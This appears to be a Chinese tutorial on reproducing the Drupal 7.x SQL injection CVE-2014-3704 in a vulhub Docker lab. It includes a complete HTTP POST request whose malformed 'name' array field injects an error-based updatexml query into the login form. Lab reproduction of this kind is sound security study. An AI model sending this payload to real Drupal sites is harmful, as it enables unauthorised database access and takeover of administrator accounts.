您好,登錄后才能下訂單哦!
如何進行Drupal SQL注入漏洞CVE-2014-3704的復現(xiàn),很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。
Drupal是使用PHP語言編寫的開源內(nèi)容管理框架(CMF),它由由內(nèi)容管理系統(tǒng)和PHP開發(fā)框架共同構(gòu)成,在GPL2.0及更新協(xié)議下發(fā)布。連續(xù)多年榮獲全球最佳CMS大獎,是基于PHP語言最著名的WEB應用程序。
Drupal 是一款用量龐大的CMS,其7.0~7.31版本中存在一處無需認證的SQL漏洞。通過該漏洞,攻擊者可以執(zhí)行任意SQL語句,插入、修改管理員信息,甚至執(zhí)行任意代碼。
影響版本: 7.0~7.31
下面僅作漏洞復現(xiàn)記錄與實現(xiàn),利用流程如下:
一、漏洞環(huán)境
本環(huán)境采用vulhub搭建
執(zhí)行以下指令完成環(huán)境搭建
cd drupal/CVE-2014-3704/
docker-compose up -d
啟動完畢后會開啟8080端口
漏洞鏈接:http://192.168.101.152:8080/
初次訪問需要安裝,采用默認安裝即可,Mysql數(shù)據(jù)庫名填寫drupal,數(shù)據(jù)庫用戶名、密碼為root,地址為mysql
安裝完成后,訪問首頁如下:
二、漏洞利用
直接發(fā)送數(shù)據(jù)包
POST /?q=node&destination=node HTTP/1.1
Host: 192.168.101.152:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
即可觸發(fā)漏洞,注意Content-Type要設(shè)置為application/x-www-form-urlencoded
查詢數(shù)據(jù)庫
看完上述內(nèi)容是否對您有幫助呢?如果還想對相關(guān)知識有進一步的了解或閱讀更多相關(guān)文章,請關(guān)注億速云行業(yè)資訊頻道,感謝您對億速云的支持。
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。